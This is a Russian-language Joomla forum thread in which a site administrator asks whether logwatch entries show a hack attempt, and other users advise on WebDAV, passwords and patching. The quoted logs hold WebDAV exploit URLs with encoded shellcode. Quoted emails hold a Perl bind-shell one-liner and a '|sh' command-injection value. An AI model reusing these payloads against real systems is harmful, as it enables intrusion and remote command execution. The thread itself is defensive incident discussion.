Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1868 Просмотров
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
от logwatch@localhost пришли логи и я немного опешил
Что это было, реально кто то шалил или вирусня ? Сайт в корпоративной сети, поэтому очень подозрительно
Может кто то может это расшивровать на нормальный язык

По сути всё работает дальше, и на веб-сервере ничего нового и подозрительного не обнаружил, (а может не там искал, webdav - нет такой папки) но всё таки хочется знать,

Вот начало, полный текст в приатаченом файле,  IP машины с которой проводили эти действия известна
Может кто сталкивался :)
 
Код
 
 A total of 5 possible successful probes were detected (the following URLs
 contain strings that match one or more of a listing of strings that
 indicate a possible exploit):

    /webdav/pIao2q6HIxqTSuSM8BEko1wCb8sNcsOIM91YwJOwI41VBkVjVuRrEC25WlG9S0WACLaaunTdBqJlxfoZz6oqXcrYTYWwDsHeb5LUJJPs7hJQAPGFwCEbYZFeOPohdfPka4HakJDH9xjZRV0rKbWfKAFRByCA6THYqPZs42PDifNpgPfomxWhSHwEi42w8q4m0CzsGfyMjpyCS5KT1tJR3K7XOn0dCq4vuxS2GDPiEo1280s7XkfKGQ1L5t9E3JUF732lt8J46VjKzrhke5r38i4nYsUQXTvG29gzJmsUAFifIjFPEQJdM2Xn6KLUOAPgC0KYjMvhoHybnhER0MipqOpkMZ2qewaq8lzpJBoyL2XEmAQBHZ9lWlzgSBeqmzVUe3Cx8wGvTLL5DMySHL5x01VJtiuYTup1I7AmmYNzMsDAamz0tLiiPMWQcYdgvd2Q6jMiP1isa8VFLDMdKRpQAiE6o9rtuuDoWE0iJVwECS1ctnWvB88vl23mecijTqfXY1FsufTZ16RGrnq8tlLfgpA3Xq77oBbSi3JHQpBxaGkMtsCLhrLLg8jeEM1KdcGmxDMixiM2ELGtHhzU9TMeQ9R1XKQkpQDd15ynBglDoxYIdxa1ro25z7rAZfINtejTAZqN7uovSALva6KYM4ZggLyqIo8LMVAiECQRwnP4As2EZFwa96eNLYJHskoqf9vu4Eqkpj95nGXGoY0RVxv5D2dp6iSXuevk8y0beTSMUJu6lKQwIv0zta59%eb%06%d2%a0%77%21%01%12%81%ec%60%fe%ff%ff%59%59%83%e9%3c%8a%01%3c%41%75%03%41%eb%f7%ff%e1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLZHK9EPC0C0QpK9KUTqIBE4NkPRTpNkV2TLLKRrGdLKCBExTOX7CzVFTqIoTqKpNLGLCQCLC2VLEpO1XOVmVaKwXbXpV2V7NkCbR0NkQRElEQXPNkQPT8K5O0PtCzGqN0PPNkRhGhNkQHQ0VaKcZCElG9LKTtNkEQXVEaKOP1O0LlKqZoVmEQXGVXKPPuL4ESCMZXEkQmTdRUKRChNkPXVDVaKcE6NkVlRkNkV8ELC1ICNkETLKEQXPLIQTQ4Q4CkQKPaCiCjV1IoKPV8QOPZNkEBZKNfCmE8GCVRGpGpPhQgCCVRQORtQxRlQgVFC7IoIEMhLPC1C0GpEyZdV4V0PhGYOpRKEPIoIERpPPPPRpCpPPQPV0CXKZTOIOKPIoKeMYZgEaIKV3PhERC0QKOoMYZFPjVpRvPWE8ZbIKEgCWKOKePSPWPhLwIyEhKOIoXUQCPSCgE8QdZLEkXaIoIERwLIZgCXT5RNRmQqIoN5CXE3RME4C0NiZCV7PWV7TqXvRJR2CiCfM2KMPfZgQTTdElVaVaNmRdTdTPKvGpQTCdPPRvPVCfRfV6PNQFPVQCRvRHT9XLGOMVKON5NiKPRnQFG6IoVPPhGxLGGmE0IoKeOKZPLuNBRvCXMvMEMmOmKOKeGLC6QlVjOpKKKPT5VeOKQWR3QbPoPjC0RsIoKeAAHP2oAbiMBL8CEUUZKDYxJgDoQXQeXAZyxj10wgDbmuZwMwPqAg176sbm868xaoSuKL6ZmnTwTWcmkg9bQuXOCPFTSufYgAdZXhJXtt5GKJ62DEjhtXm4MZuQp7l0vBklbdWkXmQgH2zBqSyGTtpcwxAUbknhXmQhV9lqYlB9sJmGlWJyqbAuhCB44M!
 LS55Jlgo
3jCVkiLJAwTHfzg9Z9SYXJCkCfLlMz6yumgC0HVasw2GM9j2UD7OJxACbrVsOgMUeSyJoJZXSTSK9XuvDJjCrKnC1izEd3vkGf8dRypdLi8Ie2f15dmOOWtNWy3ngDeLmogMj4ZGzS4J29oGihhtWgmwUS0RGbDtt8EF0 HTTP Response 200
    /webdav/tuiS1mKpgtVqet4iTS5W5l6fNzCP0CIiWVpDIc5gPRPkrHUGIYtcNENo0HBk60w6cBxeP747v4kbAhLBILhntMfaStvFHmipUwGz2URPCuBdxklCwt5rRao033UpSVJEwh2AS5wWcUvSuGeQcyG6zkuTdpLBQnoHY8Y7NQKHsdyF3I2E8jqDESaYQaQMYgdY4q6yAuDH29ZP5OWYJ6udDVUzR3yHMyXUtY5uJds3nKeAV45iSYpNweRwkhaxyyXuX77MAmQ42bJvZzT1sFBTaEAhUbXEy1NBVbv5Ts8TEmEF8z7ov7OUSqJ9O5YwoWEVcyW1XggWGRkXouifApBDIWZ6V9mSrjWFyU0VZknBLCaVHHygc795xjyKhSD9k73ezlIiq6WS3jQb529oU5LoDYYA2DzfUCUxmWpVfJUgnOMyTBUFBw4JUtP36f0GnN98Wr56SX4Cv5QMLFFmaVqxAF3JLcYds45GdO2KJ61tYRqPKPZzqRYB8Xq0DlX86kSZ28VxvdVIkWTUJkD0ejwrNo7BnuxUmWs25GZtRFEsst9QdEWARXlAZjjjEuIcgYBw8zVhJZHzLsAj98frLMJHl1t75hD0NF0HV8qex1bLQKdzMcqn3OerTq3dG07ut460HlWNDslro8p7DyOHS0wMvDhBeOuxFESC8o2I8145lDWY00Kjb0lc2Zd5Mwi8JNP7xvXVztjDqlBIpBHBFlAfMm3g8VjgpsuVbROmyAqvJhSYBIyhm7i6nwfR%eb%06%7a%e3%77%21%01%12%81%ec%60%fe%ff%ff%59%59%83%e9%3c%8a%01%3c%41%75%03%41%eb%f7%ff%e1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPQpLIZEVQN2RDLKRrTpNkV2TLNkPRVtNkPrExVoNWPJQ6P1IoTqO0NLGLCQCLGrTlEpZaZoTMEQIWM2ZPCbRwLKQBVpLKCrElEQN0LKQPCHLEO0QdPJGqXPPPNkCxGhLKChQ0GqICM3GLPINkEdNkGqKfTqIoP1O0NLKqXOTMEQO7EhKPRUXtGsCMIhEkQmTdRUZBRxLKV8EtGqXSCVNkTLPKNkQHGlVaN3LKC4NkGqZpOyPDGTQ4QKQKE1PYQJPQIoIpQHCoPZNkVrZKMVCmRHP3VREPEPE8QgRSTrQOCdE8PLQgEvC7IoIEX8NpEQGpEPEyXDV4RpE8Q9OpRKEPIoXUPPPPPPV0CpPPG0PPRHIzVoKoKPIoIEMYXGEaIKRsQxVbC0ExXlMYKVPjVpV6QGE8XBIKGGRGKOKeCcCgE8MgXiEhIoKON5RsPSQGRHCDZLGKKQIoIEV7LIKwPhQePnPMQqIoIEPhPcRME4C0MYKSCgCgCgVQL6PjVrCiRvKRImRFXGG4VDElEQEQLMCtEtTPIVGpQTQDPPV6QFCfRfQFRnQFRvV3PVRHPyXLGOMVKOIEOyKPRnCfCvIoP0CXEXK7EMCPKOXUOKL0LuI2RvRHI6LUOMMMIoXUElTFCLVjK0IkKPRUC5OKPGGcT2PoQzEPV3KON5AACjX4GiEyKKjDaHhaknxmKcjpyMKLcArlUNYvnKolmX8VIqxktwASDeCW3dJESorv3F3WrswUpXzFbCgCONQtNXt52Z82VDn65aKPYi21eW8csFdy7wlrH89bRz6Mvp2JED9z7XUDbNBLK3zdG0cBB54JrhAzQ1VJxZmIoGoN6YVUEI3x4O8kPlN3B6!
 fFVeFC2Y
TvJUHJpS0jxpMHo1H7mxQiwPiBfnW6uHBXSGuGvbYyMywOeHRmPWDbPLngCUI14h0fjDrtOYRRE1wFXEnYmONdJr1u6sgeiBi9Kd0CC0Vhl1bWWhnKWWLjMIhT4d4wYWzp5bdoqYePveUKiICPNCnR7PN3K9f3w4TkJLj HTTP Response 200
    /webdav/HbCbYpu7tnKTbAKHfmV9fqRhEZr87kUY7O8rSKJrfz4wcdFMLX0KYeWGM4IIK21fQ78WRCEpTKkAT4ZfKJobfceUBeYNBwU7qvb6lA6VytDYm9adjcdZ9xCYhmmDVwxTfH1WgWsAQ1vi3bJpF1V9PcIiMmzv9PriHZOhTqWhCtsEpTJ1CL5guT6fLvcUBfZAYjpAQj7SvHbGmxek1s9bWSoigl3rvG3yXv1efKUxUGiLfS48xr3o4mSoFh54rbITkB1VoA64CehjlnDfdPIxmVD13GrFQV7I1vRC2Iv1NqOrDv9JY0fKuujHwnqmUwltO3PAVNoSXmozJMKznckgrJog2C9f5ECprfZLsReJXpZsuiZ4ZEWkLuPqBr5xtSBaiKUVlMwcsNRdc9JnvQ46RbI9yiAxdiOWGRi0j2D8ud1NAN72QSKoN0XLAEh4AMQsEFKB2m6mKcvXRw4aAC1Ap1NSWBwr0zKMDx8aKT9wSznBTFNAkkXKFw4xBDuCGrEA5BZStg3LPyzXndWX709TIMNsH84rsoW0lnjO5YtVWpsqgiNv2FmhKKBJgwBLD3ZlJFYFrHJtdJMlBhXc5OBzV015cmAj7C1AJ3NYmldghl4tpQn9keWWX9fzejpaiN5l0EbRZ0ye9egLxQDNbYukxUp4hrjelYgQyYUwym4T8rp1rTFQmOyABpdnqi5vg6iXNohVPUO5bOsL70a9P3Q74qhdcTE8KMl1EyM5aZqf7DHY4rMGhW7gUeKJ%eb%06%90%61%77%21%01%12%81%ec%60%fe%ff%ff%59%59%83%e9%3c%8a%01%3c%41%75%03%41%eb%f7%ff%e1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxLIC0C0EPE0OyXeTqKbE4LKRrTpNkCbVlLKCbVtNkCBQ8VoLwQZQ6TqIoP1O0NLElCQQlERVLGPKqZoTMGqKwIrZPCbRwLKPRVpLKCrGLC1ZpLKCpCHNeO0CDPJEQZpPPLKG8VxNkQHEpVaICM3GLG9LKVTNkVaIFVQKOVQKpNLIQZoTMGqO7P8KPCEIdTCCMIhEkQmTdPuM2PXNkChTdEQKcRFNkVlPKLKRxGlC1N3NkGtNkGqXPLIRdQ4VDQKCkE1V9QJV1IoM0PXCoPZLKTRZKNfQME8EcP2EPGpCXRWRSGBCoV4QxPLPwEvGwKOXUNXZ0VaGpGpEyO4QDPPRHGYMPRKEPIoZuRpRpPPRpG0V0CpPPCXZJVoIOKPIoZuMYO7VQKkQCE8TBGpQ0IGOyKVCZVpCfV7QxXBKkTwE7KOIEPSQGQxNWIyGHKOIoZuPSRsQGCXQdXlEkM1KOKePWMYIWCXRURNPMCQIoN5PhCSPmE4GpK9XcPWCgV7TqL6CZTRRyPVZBKMPfXGRdVDElGqC1LMQTGTVpKvGpQTQDPPQFCfPVPFV6RnRvPVRsV6RHT9XLEoMVKOIENiKPPNPVQVIoVPPhTHK7GmE0KON5MkXpOEMrQFRHLfOeOMMMIoZuElC6CLTJMPKKIpQeGuOKRgVsPrROQzGpQCIoXUAAR8pUUhthkfnybvDcV8eEHZg10d5IbwPLbLmadYaDMuqd7M8LewjyWmiKlkEmW3VTrzTUvnNFEeeUzg5vpfgnStqJRouve0tN6QYdA5fTTkbflQKP4bVfrTErYHjSCSbw481sxcUv273GiaklXdWFHzGa4wCb9qQiLXmFz4W2mJSMmuZt0cWc1izteq!
 UWglVUFk
yYCGNNrIsRcKPX2jb0gFT5nwUIXnzVj6gHjMFebg4AaGfmEIcfmzpuo8n8c8lxIqXmDtD5wVGH9zGF9rPjshUceN4gW1L1ZqDm0bCNbuqASOX5Vg9C1pUgIJTop0ocACrz2t5MOcOppUvzTUJDR9yl7x7J9v7yUe3Z1AV HTTP Response 200
    /webdav/1iKqTehOsGOrIATguqrGig5M9RFe5BsLec8Ipwvt8kItkQnAIJuxeJiEzkfHxxLX71qJxt4IDhaWFTM14Lh4g39kpcnxIx9v6YwlCega2RuSAETvX1XOLX2dXOpbTG07q4RKxAKaIUkKIyoCqiyhSiLsUFKl6IVpY8gNBPMTZrP9cWtGs0QNQXuvRhLhXso2xuYCymohwcX9CH6UnN8SJ909EZszYDdlWdr8Z1BT8Ntddo7pduzahn79k4yYkX6Dum1RPi0lrvax2Kn5x784W7PDHIbezjxSMveHG3Q99ejeHArOvLFjET6HMq4s52xZnNK4JTju3XVW0BO9VgbhbtYKa0BBRQ8yiNvNPqX8RJp6UyG8wRGrGqNJ8VU6bM99RrnlmRos6x0LMK0tiiGkKfTP8uWG4ACpwww1DiKymcWFg2PaQCeudrqlFSHAkoheiZPyhcixLnSIyySWrf9jRB9mmguk4XSuSZck9PQfNyc4CbuReeuUpUTUmTQBvXVb5mqfQZdBJFsYFPoEl9OPsuHhExwBkACCeTCgqbY78IVCdTtz70AtXxpPE0VkNfj0xct1Q7CUh0D6opg9MnKyJ04j0COziZpzTmqEkkXAesdFBWi73x1UCNSXDSVXtfYwqw0cM0fqtIUMY7lou8ftapa8bPkEUysZkKq1xhXnWArt0rDcEDvGx0dAR5M8TpHOqcccG6DddkkjjJU9AkPw7dSEmJm4HXBAHdR2jBoTjuVxzY40s0qnnfNh%eb%06%6b%7e%77%21%01%12%81%ec%60%fe%ff%ff%59%59%83%e9%3c%8a%01%3c%41%75%03%41%eb%f7%ff%e1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHOyGpC0C0QpNiZEVQN2E4NkV2P0NkCbVlLKRrEDLKT2Q8VoX7QZQ6P1IoEaKpLlElCQCLERVLGPZaZoTMGqIWIrXpQBQGNkRrVpLKCrGLVaN0LKG0T8MUKpPtRjEQXPRpLKG8GhLKQHQ0C1KcKSGLQYLKEdLKVaIFTqIoVQO0NLIQXOTMC1KwTxKPT5ZTGsCMXxGKQmEtRUM2PXLKChQ4VaN3CVNkVlPKLKPXELVaZsNkVdLKVaN0LIPDVDQ4QKCkCQV9CjV1IoIpV8CoPZNkEBXkOvQMQxTsGBGpEPE8RWT3GBCoQDE8RlRWGVGwKOZuX8LPGqGpC0VIO4CdPPQxEyK0RKC0IoKePPRpV0PPQPRpQPPPCXXjVoIOIpIoKeOyO7EaIKCcPhC2EPVYCqNiKVRJVpPVRwRHKrIKVWE7KOZuPSV7QxNWM9VXIoIoZuRsQCV7RHRTXlGKKQKOZuRwLIZgCXPuPnPMPaIoKeE8QsRME4C0K9M3RwPWRwP1IfQzR2PYQFM2ImRFO7PDTdGLGqC1LMRdEtVpXFGpPDV4V0PVV6CfCvPVRnQFV6QCV6RHRYXLGOK6IoZuOyIpPNV6RfIoP0PhGxNgEMQpKOIEOKZPOEMrPVCXI6Z5MmMMIoN5ElTFCLGzMPIkKPT5EUOKPGVsPrROCZC0RsKOXUAAzaqzvvvcsNY0RthM8ErJJ6tHcK90cyR3TraDtNxUSXmFw1eslJbQTrO1CKz40vstQYazLFCeGqUGm3OBUhMEv3rPqSfi1PYEYD4gHLRUk3MTxyDpMwM2B4S4lAU7iWFrAxP4PyD7uZpWRgD8BpXeL2AMpJyiEor3iSb0ZCN1SJbHeuTTLRtfJbDE3H!
 Insea2d3
m2eaYwuvIAB4DSbFUumKCI9g73ZM7HwimBGQnvirkABKYjkXdjZTOHV1KseWHMjKb6sidVZ9Uxj8kEWTQnXOX7AajmT4uMiiLYDgABI6a6DMaepmR2KuQBhFVuP1zXF31jexNAqfKlim6Iu6lLSqGGMfKxHb9IoNUFKDl HTTP Response 200
    null HTTP Response 200

Кто скажет умные мысли ?
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Re: Попытка взлома или работа вируса ?
« Ответ #1 : 29.04.2013, 02:33:56 »
Судя по всему на вас пробовали какой то эксплоит, причем судя по некоторым признакам он от 2005 года, вполне возможно что получили админ доступ и угнали пароли. По поводу webdav почитайте так же посмотрите отчет
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Re: Попытка взлома или работа вируса ?
« Ответ #2 : 29.04.2013, 04:06:19 »
вполне возможно что получили админ доступ и угнали пароли.
Авторизировался на сайте админом и менеджером, а так же на других независимых скриптах (пароли не поменяли)

Изменившихся файлов нет

По поводу webdav почитайте
чёт это сложное, но вроде я такого не использую



*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Попытка взлома или работа вируса ?
« Ответ #3 : 29.04.2013, 04:13:43 »
Неплохо было бы задействовать и своего хостера.
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Re: Попытка взлома или работа вируса ?
« Ответ #4 : 29.04.2013, 04:18:29 »
Сайт в корпоративной сети, поэтому очень подозрительно

Какого хостера? сервер у меня за спиной стоит, всё сам настраивал

По сути интересно, это специально делали или это возможно действия вируса на виндовой машине пользователя который заходит на сайт

Если бы зафиксированый айпишник был из моей локальной сети, я бы юзверя сразу за жабры взял, а так он из другого города, поди разберись, хулиганит или у него там вирус шалит
« Последнее редактирование: 29.04.2013, 04:24:31 от palexa »
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Re: Попытка взлома или работа вируса ?
« Ответ #5 : 29.04.2013, 11:06:18 »
Авторизировался на сайте админом и менеджером, а так же на других независимых скриптах (пароли не поменяли)

А с чего Вы решили что пароли будут менять? Это сразу же станет заметно, пароли могли просто заполучить используя эксплойт через уязвимость какого то компонента или скрипта, потом незаметно подгрузят какую нибудь гадость и перенаправят Ваш трафик в другом направлении. Менять то в первую очередь нужно Вам ну и соответственно латать дыры в программном обеспечении.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Попытка взлома или работа вируса ?
« Ответ #6 : 29.04.2013, 13:01:29 »
какая ОС установлена, почитайте тут и тут про webdav
а иньекции сайтов спокойно могут делать из вне, и как боты так и люди
*

palexa

  • Завсегдатай
  • 1108
  • 88 / 0
Re: Попытка взлома или работа вируса ?
« Ответ #7 : 29.04.2013, 16:29:09 »
Для начала поменял все пароли на сайты, другие скрипты и так далее. К серверу MySQL, и на всякий случай рута и других пользователей что имеют доступ по ssh (хоть там и ограничение по IP, :) ).

webdav - не был сконфигурирован, поэтому не использовали и естественно доступа к /site/webdav/ небыло

но на всякий случай закментировал в httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so

Стоит CentOS 5.9
Про webdav вообще только узнал из за этого лога, надо почитать что это такое подробнее, спасибо за ссылки

Тут еще как раз в этот день 4 письмеца пришло, вот такие

Цитировать
ОТ:
perl.-MIO.-e.'$p=fork, exit@домен моего почтовика (), "if$p;$c=new IO::Socket::INET(LocalPort,7625,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while" <Postmaster>

"тело письма"

Return-Path: <zombie@brains.net>
Received: from X ([ip-негодяя, внутренняя, не инетовская])
        by домен моего почтовика (8.13.8/8.13.8) with ESMTP id r3RBRpPI017217
        for <nobody+"|sh msg*"@localhost>; Sat, 27 Apr 2013 14:27:51 +0300
Date: Sat, 27 Apr 2013 14:27:51 +0300
Message-Id: <201304271127.r3RBRpPI017217@домен моего почтовика>
From: ;;perl.-MIO.-e.'$p=fork;exit@домен моего почтовика ();,
        "if$p;$c=new IO::Socket::INET(LocalPort,30777,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while"<>'

Ну пока всё, спасибо за наводки, посмотрим что будет дальше :)


flyingspook - НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor - платный или нет ? а то заказать есть, а про платность (бесплатность) я ничего не вижу

« Последнее редактирование: 29.04.2013, 16:34:51 от palexa »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Файл конфигурации попытка взлома

Автор Evgenii_web

Ответов: 8
Просмотров: 1707
Последний ответ 09.03.2019, 11:06:54
от wishlight
Попытка взлома сайта или что это?

Автор vad78

Ответов: 12
Просмотров: 1811
Последний ответ 11.06.2018, 13:57:10
от vad78
Бесплатная защита сайта от взлома, парсеров, DDoS и других кибератак

Автор Core System

Ответов: 16
Просмотров: 3294
Последний ответ 09.06.2018, 14:58:54
от Core System
БД после взлома

Автор cntrl

Ответов: 11
Просмотров: 1360
Последний ответ 09.01.2018, 17:06:17
от Aleks.Denezh
[скачать] jHackGuard 1.4.0 - плагин защиты от взлома сайта, SQL инъекций, XSS атак

Автор Sulpher

Ответов: 91
Просмотров: 65241
Последний ответ 14.12.2017, 20:22:52
от karam